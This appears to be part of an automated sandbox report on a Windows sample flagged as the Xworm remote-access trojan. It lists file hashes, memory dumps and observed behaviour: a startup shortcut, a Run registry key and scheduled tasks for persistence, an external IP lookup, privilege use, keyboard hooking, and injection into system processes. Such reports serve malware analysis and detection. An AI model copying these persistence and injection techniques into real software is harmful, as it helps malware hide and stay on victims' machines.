memory/740-125-0x00007FFBE4FF0000-0x00007FFBE5000000-memory.dmp

memory/740-124-0x0000017FE4760000-0x0000017FE478A000-memory.dmp

memory/740-119-0x0000017FE4760000-0x0000017FE478A000-memory.dmp

memory/60-115-0x00007FFBE4FF0000-0x00007FFBE5000000-memory.dmp

memory/60-109-0x000001FA50C00000-0x000001FA50C2A000-memory.dmp

memory/952-105-0x00007FFBE4FF0000-0x00007FFBE5000000-memory.dmp

memory/952-104-0x00000255977D0000-0x00000255977FA000-memory.dmp

memory/952-99-0x00000255977D0000-0x00000255977FA000-memory.dmp

memory/676-94-0x0000028DB3D20000-0x0000028DB3D4A000-memory.dmp

memory/676-89-0x0000028DB3D20000-0x0000028DB3D4A000-memory.dmp

memory/4148-717-0x00007FFC06940000-0x00007FFC07401000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 77d622bb1a5b250869a3238b9bc1402b
SHA1 d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256 f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512 d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 65a68df1062af34622552c4f644a5708
SHA1 6f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256 718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA512 4e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 1e8e2076314d54dd72e7ee09ff8a52ab
SHA1 5fd0a67671430f66237f483eef39ff599b892272
SHA256 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA512 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

MD5 0b990e24f1e839462c0ac35fef1d119e
SHA1 9e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256 a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512 c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 7d612892b20e70250dbd00d0cdd4f09b
SHA1 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512 f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

MD5 ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1 a3879621f9493414d497ea6d70fbf17e283d5c08
SHA256 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA512 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 8abf2d6067c6f3191a015f84aa9b6efe
SHA1 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256 ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512 c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

MD5 f313c5b4f95605026428425586317353
SHA1 06be66fa06e1cffc54459c38d3d258f46669d01a
SHA256 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512 b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

memory/4148-1010-0x00007FFC06940000-0x00007FFC07401000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-Powershell.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

MD5 c8997c80d62e6782e0d2109a79c65b48
SHA1 ba7cfadc38f2f35d89e6b7cb1423818671d734a7
SHA256 56649e15f98d2fb2f0c39adc5e400073334923c9e881edcfc1d704d33edd2a2b
SHA512 bc5e1b492c7bd658613f34ed433f54e751487bb48588990c973f62f233dd86ea68d1bccd8ec748da0997e6f10d86d05ab3a57d084195be312c22007a91a2b8fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c66ca4b1a1eaa02c517db1ae95de9ef5
SHA1 1ac7160d17b60c0b765083e8f4b3f93bbc5654ae
SHA256 288d580fc4625a08bc38e96aeaf3cfcfb5da5dad7a95cab9d6b7c8a32b927f97
SHA512 2b324bf5637fbb37142d0af1a9559d10cc561dded19b36791ec4e3462a11300856d1e96a27c440218d71695865293b6f8f36729528f18ef9537e0f839908f27c

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 00:17

Reported

2024-05-27 00:22

Platform

win11-20240426-en

Max time kernel

300s

Max time network

298s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1436 created 644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-Powershell.lnk C:\Users\Admin\$77-Cheat.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-Powershell = "C:\\Users\\Admin\\$77-Powershell.exe" C:\Users\Admin\$77-Cheat.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\$77-Powershell C:\Windows\system32\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1436 set thread context of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\$77-Cheat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\$77-Cheat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 4624 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\$77-Cheat.exe
PID 4624 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 4624 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 4624 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\$77-Loader.exe C:\Users\Admin\Install.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 1436 wrote to memory of 2368 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
